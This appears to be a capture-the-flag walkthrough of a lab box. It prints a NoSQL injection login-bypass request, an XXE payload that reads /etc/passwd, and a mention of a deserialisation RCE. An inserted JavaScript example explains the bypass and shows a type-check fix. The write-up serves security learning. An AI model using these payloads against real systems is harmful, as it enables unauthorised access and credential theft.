$ nmap -p- --min-rate 5000 10.129.96.160
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 07:30 EST
Nmap scan report for 10.129.96.160
Host is up (0.013s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
NoSQL Login Bypass
This was a UHC qualifier box in 2021.
There was a login functionality there. I tested some SQL Injection but to no avail. Because this was a UHC box, this was probably the way in. I tested some NoSQL injection and it worked in bypassing it!
POST /login HTTP/1.1
Host: 10.129.96.160:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 56
Origin: http://10.129.96.160:5000
Connection: close
Referer: http://10.129.96.160:5000/login
Upgrade-Insecure-Requests: 1

{"user":"admin","password": {"$ne":"admin"}}
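Why the request above gets past the login check, and the input validation that stops it, as an added example that is not code from the original post or from the box's server.js. The in-memory matcher stands in for MongoDB's `$ne` handling so the example runs offline; the user record is constructed sample data.

```javascript
// Constructed sample data standing in for the users collection.
const users = [{ user: "admin", password: "sample-password-placeholder" }];

// Minimal stand-in for MongoDB's operator matching: a plain value must be
// equal, an object is treated as a set of operators ($ne, $gt) like Mongo does.
function fieldMatches(value, cond) {
  if (cond !== null && typeof cond === "object" && !Array.isArray(cond)) {
    return Object.entries(cond).every(([op, arg]) => {
      if (op === "$ne") return value !== arg;
      if (op === "$gt") return value > arg;
      throw new Error("operator not modelled by this stand-in: " + op);
    });
  }
  return value === cond;
}

// Stand-in for collection.findOne(query): first document matching every field.
function findOne(collection, query) {
  return (
    collection.find((doc) =>
      Object.entries(query).every(([k, cond]) => fieldMatches(doc[k], cond))
    ) || null
  );
}

// Vulnerable pattern: the parsed JSON body is passed straight into the
// filter, so {"password": {"$ne": "admin"}} becomes an operator query that
// matches the admin row for any password other than "admin".
function loginVulnerable(body) {
  return findOne(users, { user: body.user, password: body.password }) !== null;
}

// Hardened pattern: credential fields must be plain strings. An object (and
// therefore any operator) is rejected before it can reach the query, so the
// filter only ever compares literal values.
function loginHardened(body) {
  const { user, password } = body;
  if (typeof user !== "string" || typeof password !== "string") return false;
  return findOne(users, { user, password }) !== null;
}
```

The same type check is what a schema validator (or Mongoose's string cast with strict mode) gives you; a bypass attempt then shows up as a rejected request, which is worth alerting on.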
XXE Injection
All of the functions do nothing much, except for the Upload one. When trying to upload something, I get this error:
Invalid XML Example: Example DescriptionExample Markdown
This indicates that we have to upload a malicious XML file to achieve XXE injection for our reverse shell. Taking a look at the POST request in Burp Suite reveals that we need this format:
I headed to PayloadAllTheThings to try some XXE injection payloads, and it worked rather well:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<post>
<title>mypost</title>
<description>testfile</description>
<markdown>&file;</markdown>
</post>
Then we can save this into a file and upload it. The output would be printed in the markdown area:
Earlier while testing my NoSQL injections, I did run across an error like this:
So the source code files are in /opt/blog. A bit more testing revealed the main file to be server.js.
First thing I notice is that there is deserialisation going on. This web application must be vulnerable to RCE through deserialisation. This article showed up when I searched for this exploit:
I tested the token given there (after URL encoding it) and it worked:
Earlier we used NoSQL injection to access this, and perhaps we can find the actual credentials for the admin user (so that I can check sudo privileges). Some DBs and collections can be found here.
I could find a password in the users collection.